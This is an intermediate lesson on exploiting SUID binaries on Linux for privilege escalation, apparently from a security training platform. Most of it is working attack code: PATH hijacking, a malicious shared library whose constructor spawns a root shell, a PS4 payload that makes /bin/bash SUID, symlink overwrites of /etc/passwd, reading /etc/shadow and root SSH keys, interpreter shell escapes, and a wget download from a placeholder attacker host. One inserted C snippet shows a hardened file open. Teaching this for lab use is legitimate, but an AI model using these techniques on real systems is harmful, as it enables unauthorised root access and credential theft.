SUID Exploitation Techniques

Intermediate | 35 min | Writeup

Various methods to exploit SUID binaries

Learning Objectives

  • Exploit common SUID binaries
  • Use shared library attacks
  • Exploit PATH manipulation
  • Chain SUID vulnerabilities

You've found a SUID binary - now what? Beyond simple GTFOBins lookups, SUID exploitation includes shared library attacks, PATH manipulation, and environment variable abuse. These techniques work even on seemingly "safe" binaries.

Think of SUID exploitation like social engineering a bouncer. Even if the bouncer (binary) is strict, you can trick them by changing the environment they trust - fake libraries, modified PATHs, or manipulated variables they depend on.

Beyond GTFOBins

GTFOBins covers direct exploitation. This lesson covers indirect methods - attacking the environment and dependencies of SUID binaries.

PATH Manipulation

If a SUID binary calls other commands without full paths, you can manipulate PATH to make it run your malicious version instead.

bash
# Example: SUID binary runs "service mysql restart"
# The binary trusts PATH to find "service"

# 1. Analyze the binary
strings /usr/local/bin/backup | grep -i service
# Output shows: service mysql restart

# 2. Check whether it uses a relative path (no /usr/bin/service)
ltrace ./backup 2>&1 | grep -iE 'system|exec'
# If you see: system("service mysql restart")
# it uses a relative path = vulnerable!

# 3. Create malicious "service" binary
echo '#!/bin/bash' > /tmp/service
echo '/bin/bash -p' >> /tmp/service
chmod +x /tmp/service

# 4. Modify PATH to prioritize /tmp
export PATH=/tmp:$PATH

# 5. Run the SUID binary
./backup
# Now our fake "service" runs as root!

Finding PATH Vulnerable Binaries

bash
# Look for system() or exec* calls with relative paths
strings /path/to/suid | grep -E "^[a-z]"   # Commands without a leading /

# Common patterns to look for:
strings /path/to/suid | grep -E "service|cat|ls|cp|mv|rm"

# Use ltrace to see library calls
ltrace ./suid_binary 2>&1

# Use strace to see system calls (-f follows the child that system() spawns)
strace -f ./suid_binary 2>&1 | grep exec

Modern Protections

Most SUID binaries shipped by modern distributions call their helpers by full path or reset PATH themselves, so this technique works mainly on older systems or custom binaries.

Shared Library Hijacking

If you can write to directories where a SUID binary looks for libraries, you can inject malicious code that runs as root.

bash
# Check library dependencies
ldd /path/to/suid_binary
# Example output:
#   linux-vdso.so.1
#   libcustom.so => /opt/libs/libcustom.so
#   libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6

# Check for writable library paths
ls -la /opt/libs/
# If writable, we can replace libcustom.so!

# Check LD_LIBRARY_PATH (usually blocked for SUID)
# Check /etc/ld.so.conf and /etc/ld.so.conf.d/

# RPATH/RUNPATH in binary
readelf -d /path/to/suid_binary | grep -i path
# If RPATH points to a writable location = vulnerable

Creating Malicious Library

c
// malicious.c - compile and replace the target library
#include <stdlib.h>
#include <unistd.h>

// Constructor runs when the library loads, before the SUID binary's main()
static void inject(void) __attribute__((constructor));

static void inject(void) {
    setuid(0);   // euid is already 0 under SUID; make the real uid 0 too
    setgid(0);
    system("/bin/bash -p");
}

bash
# Compile the malicious library
gcc -shared -fPIC -o libcustom.so malicious.c

# Replace the original (if writable)
cp libcustom.so /opt/libs/

# Or use LD_PRELOAD if the SUID binary allows it (rare)
# LD_PRELOAD=./malicious.so ./suid_binary

# Run the SUID binary - our constructor executes!
./suid_binary

Environment Variable Abuse

bash
# Some SUID binaries trust environment variables

# LD_PRELOAD (usually blocked for SUID, but check)
LD_PRELOAD=/tmp/malicious.so ./suid_binary

# LD_LIBRARY_PATH (usually blocked)
LD_LIBRARY_PATH=/tmp ./suid_binary

# BASH_ENV (for bash SUID)
BASH_ENV=/tmp/evil.sh ./suid_bash

# PS4 (bash debug mode)
# If the SUID binary runs bash scripts:
env -i SHELLOPTS=xtrace PS4='$(chmod u+s /bin/bash)' ./suid_script

# HOME directory manipulation
# Some binaries read config from $HOME
HOME=/tmp ./suid_binary

Modern Linux Blocks Most

The dynamic loader ignores LD_PRELOAD and LD_LIBRARY_PATH when a binary runs with elevated privileges (secure-execution mode), so those two rarely work. Custom or older binaries might still be vulnerable to other environment variables.

bash
# If the SUID binary creates files in predictable locations,
# you can symlink them to sensitive files

# Example: SUID binary creates /tmp/app.log
# 1. Create the symlink before it runs
ln -s /etc/passwd /tmp/app.log

# 2. Run the SUID binary
./suid_binary

# 3. If it writes to /tmp/app.log, it actually writes to /etc/passwd!

# Race condition version (TOCTOU):
# create the symlink between the binary's check and its write

# Watch for file operations
strace -f ./suid_binary 2>&1 | grep -E "open|write|creat"
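As an added example (not from the lesson), the file creation this symlink attack relies on, with the vulnerable open beside an atomic one that refuses the planted link; the function names and the temp-directory demo are this example's own.

```c
#define _GNU_SOURCE
/* Added example, not code from the lesson: the log-file creation that the
 * symlink attack above targets, vulnerable and hardened side by side. Names are
 * this example's own; a real service also keeps its logs out of /tmp. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable (what the lesson assumes): open() follows symlinks, so a link at
 * app.log turns the append into a write to its target. An lstat() check before
 * this open does not help: the link can appear between check and open (TOCTOU). */
int unsafe_open_log(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_APPEND, 0600);
}

/* Hardened: one atomic open. O_NOFOLLOW refuses a symlink as the final component
 * and O_EXCL refuses any pre-existing object, so a link planted before or during
 * the run fails the same way. The result is then verified via the fd, not the path. */
int safe_open_log(const char *path) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW | O_APPEND, 0600);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_uid != geteuid()) {
        close(fd); errno = EPERM; return -1;
    }
    return fd;
}

/* Rebuilds the lesson's scenario in a private temp dir ("app.log" -> "target").
 * Returns 1 if the unsafe open wrote through the link, the hardened open refused
 * it, and the hardened open still works on a fresh path; otherwise 0. */
int demo_symlink_scenario(void) {
    char dir[] = "/tmp/suid-demo.XXXXXX", lnk[128], target[128], fresh[128];
    if (mkdtemp(dir) == NULL) return 0;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(lnk, sizeof lnk, "%s/app.log", dir);
    snprintf(fresh, sizeof fresh, "%s/fresh.log", dir);
    int t = open(target, O_WRONLY | O_CREAT, 0600);
    if (t < 0 || symlink(target, lnk) != 0) return 0;
    close(t);
    int ufd = unsafe_open_log(lnk), good = safe_open_log(fresh);
    struct stat a, b;
    int followed = ufd >= 0 && fstat(ufd, &a) == 0 && stat(target, &b) == 0 &&
                   a.st_ino == b.st_ino;                 /* landed in target */
    int refused = safe_open_log(lnk) < 0;                /* symlink rejected */
    if (ufd >= 0) close(ufd);
    if (good >= 0) close(good);
    return followed && refused && good >= 0;
}
```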

Abusing Binary Features

Editors and Pagers

bash
# vim/vi
./suid_vim -c ':!/bin/bash -p'
./suid_vim -c ':set shell=/bin/bash' -c ':shell'
# Inside vim: :!bash -p

# less
./suid_less /etc/passwd
# Then type: !/bin/bash -p

# more
./suid_more /etc/passwd
# Then type: !/bin/bash -p

# man
./suid_man man
# Then type: !/bin/bash -p

# nano
# Ctrl+R (read file), Ctrl+X (execute)
# Can read sensitive files at minimum

File Operations

bash
# cp - Copy files as root
./suid_cp /etc/shadow /tmp/shadow_copy
# Now crack the hashes!

# Or overwrite passwd
./suid_cp /tmp/evil_passwd /etc/passwd

# cat - Read any file
./suid_cat /etc/shadow
./suid_cat /root/.ssh/id_rsa

# mv - Move/rename files
./suid_mv /etc/shadow /tmp/shadow_backup

# chmod - Change permissions
./suid_chmod 777 /etc/shadow

# chown - Change ownership
./suid_chown youruser /etc/shadow

Network Tools

bash
# nmap (old versions with --interactive)
./suid_nmap --interactive
# At the nmap> prompt: !bash -p

# tcpdump
./suid_tcpdump -nn -i lo -w /dev/null -W 1 -G 1 -z /tmp/shell.sh
# shell.sh contains: /bin/bash -p

# wget/curl - Download and overwrite
./suid_wget http://attacker/evil_passwd -O /etc/passwd

Language Interpreters

bash
# Python
./suid_python -c 'import os; os.setuid(0); os.system("/bin/bash -p")'

# Or:
./suid_python -c 'import pty; pty.spawn("/bin/bash")'

# Perl
./suid_perl -e 'exec "/bin/bash -p";'

# Ruby
./suid_ruby -e 'exec "/bin/bash -p"'

# Lua
./suid_lua -e 'os.execute("/bin/bash -p")'

# PHP
./suid_php -r 'system("/bin/bash -p");'

# Node.js
./suid_node -e 'require("child_process").spawn("/bin/bash", ["-p"], {stdio: [0, 1, 2]})'

# awk
./suid_awk 'BEGIN {system("/bin/bash -p")}'

SUID Exploitation Methodology

Advanced SUID Attack Flow

1. Analyze: strings, ltrace, strace the binary
2. Dependencies: check ldd for libraries, readelf for RPATH
3. Path abuse: look for relative command calls
4. Library attack: check for writable library paths
5. Environment: test environment variable influence
6. Features: use built-in shell escapes/features

Knowledge Check

Quick Quiz

How does PATH manipulation work for SUID exploitation?

Challenges

PATH Exploitation

Challenge (intermediate)

Given a SUID binary that calls 'cat' without a full path, exploit it using PATH manipulation to gain a root shell.


Key Takeaways

  • PATH manipulation exploits relative command calls
  • Library hijacking works when library paths are writable
  • Modern Linux blocks LD_PRELOAD for SUID binaries
  • Analyze binaries with strings, ltrace, strace
  • Language interpreters (python, perl) often allow shell escapes
  • Editor shell escapes (vim, less) work on SUID editors